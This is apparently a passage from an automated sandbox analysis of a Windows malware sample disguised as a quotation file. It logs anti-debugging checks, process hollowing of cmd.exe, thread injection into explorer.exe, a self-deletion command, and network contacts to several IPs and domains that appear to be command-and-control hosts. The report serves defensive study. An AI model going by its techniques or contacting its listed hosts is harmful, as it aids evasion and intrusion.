Code function: 17_2_00DA2258 IsDebuggerPresent,

17_2_00DA2258

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00D8ACD5 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,

17_2_00D8ACD5

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Code function: 12_2_004088C0 rdtsc

12_2_004088C0

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00DAB5E0 mov eax, dword ptr fs:[00000030h]

17_2_00DAB5E0

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Code function: 12_2_00409B30 LdrLoadDll,

12_2_00409B30

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D96FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		17_2_00D96FE3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D97310 SetUnhandledExceptionFilter,		17_2_00D97310

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.30.32.154 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.zahad-riedel.com
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thetanheroes.com
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eduardoleonsilva.com
Source: C:\Windows\explorer.exe	Domain query: www.pinnaclecorporaterentals.com
Source: C:\Windows\explorer.exe	Domain query: www.jypmore.quest
Source: C:\Windows\explorer.exe	Domain query: www.mermadekusse.store
Source: C:\Windows\explorer.exe	Domain query: www.indianasheriffs.biz
Source: C:\Windows\explorer.exe	Network Connect: 162.241.2.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.myveguiolcusbyopappgroup.com
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.144.34.39 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D80000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Memory written: C:\Users\user\Desktop\quotation New Order I5117.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3352	Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process created: C:\Users\user\Desktop\quotation New Order I5117.exe C:\Users\user\Desktop\quotation New Order I5117.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\quotation New Order I5117.exe"			Jump to behavior

Source: explorer.exe, 0000000D.00000000.302015501.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.339555658.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.322924752.00000000011E0000.00000002.00020000.sdmp, cmd.exe, 00000011.00000002.548470261.0000000005EB0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.339139657.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.301528755.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000D.00000000.308442262.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.302015501.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.339555658.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.322924752.00000000011E0000.00000002.00020000.sdmp, cmd.exe, 00000011.00000002.548470261.0000000005EB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.302015501.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.339555658.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.322924752.00000000011E0000.00000002.00020000.sdmp, cmd.exe, 00000011.00000002.548470261.0000000005EB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.302015501.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.339555658.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.322924752.00000000011E0000.00000002.00020000.sdmp, cmd.exe, 00000011.00000002.548470261.0000000005EB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000D.00000000.350157871.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.315794164.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.332026348.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Users\user\Desktop\quotation New Order I5117.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
